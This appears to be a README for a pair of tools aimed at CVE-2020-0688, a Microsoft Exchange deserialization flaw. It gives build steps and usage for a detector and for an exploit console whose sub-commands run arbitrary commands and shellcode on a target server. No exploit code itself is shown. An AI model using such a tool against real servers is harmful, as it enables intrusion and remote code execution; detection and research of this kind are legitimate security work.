Home

Awesome

Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability)

build

csc ExchangeCmd.cs
csc ExchangeDetect.cs

usage

ExchangeDetect <target> <user> <pass>

ExchangeCmd <target> <user> <pass>
sub commands:
	exec <cmd> [args]
	  exec command
		
	arch
	  get remote process architecture(for shellcode)
		
	shellcode <shellcode.bin>
	  run shellcode
		
	exit
	  exit program

for more information, read writeup.pdf(in chinese).